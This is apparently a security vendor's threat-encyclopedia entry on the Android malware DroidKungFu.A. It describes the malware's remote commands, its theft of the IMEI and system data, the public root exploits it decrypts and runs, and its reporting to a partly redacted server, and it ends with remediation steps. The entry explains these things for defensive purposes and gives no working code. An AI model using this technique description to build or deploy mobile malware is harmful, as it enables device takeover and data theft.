Android/DroidKungFu.A!tr

description-logoAnalysis

Android/DroidKungFu.A!tr targets mobile phones running Android 2.0 or greater. The infected phone is controlled by a remote server from which it may receive and process a few commands such as:

  • execDelete: uninstall a given package
  • execInstall: download a given package and install it
  • execOpenUrl: open a given URL in the phone's browser
  • execStartApp: start a given application
The infected phone also reports back to the same server some personal and system data: IMEI, whether the phone is rooted or not, taskid, OS type, SDK version, available memory on the SD card etc.
This malware has been reported on unofficial Android markets.


Technical Details


The malicious classes are located in the application, under a path named com.google.ssearch (note the double s to search).
Firstly, the malware tries to root the phone, i.e gain root access to the device. To do so, it uses public exploits:
  • CVE-2009-1185 uDev, an exploit which uses hotplug to execute a shell as root
  • CVE-2010-EASY rageagainstthecage, another exploit which gains root access by creating a maximul limit of user processes.
Note those exploits have already been used in another malware, Android/DrdDream.A!tr.
Recent Android devices (2.3 or greater) have been patched against those vulnerabilities, but there are still numerous mobile phones in the wild without the patch.
The binaries of the exploits (ratc and gjsvro) are packed with the malware in the asset directory, encrypted by AES with a hard-coded key. The exploit binaries are decrypted and copied on the system. The malware makes sure the binaries are executable (chmod 4755), and then executes them, hoping to gain root access.
The malware reports phone's system data to a remote web server
http://[REMOVED]id.com:8511/search/rpty.php
In particular, it sends an HTTP POST with the victim's IMEI, taskid, state and comment.
The malware installs another package. com.google.ssearch.SearchService, and starts the service.

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extreme
FortiClient
Extended
FortiMail
Extended
FortiSandbox
Extended
FortiWeb
Extended
Web Application Firewall
Extended
FortiIsolator
Extended
FortiDeceptor
Extended
FortiEDR

Version Updates

Date Version Detail
2023-03-14 91.01422
2023-03-10 91.01307
2023-03-06 91.01181
2023-02-27 91.00974
2022-05-18 90.02410
2022-04-13 90.01362
2022-02-09 89.09473
2022-01-12 89.08633
2022-01-05 89.08423
2021-12-01 89.07373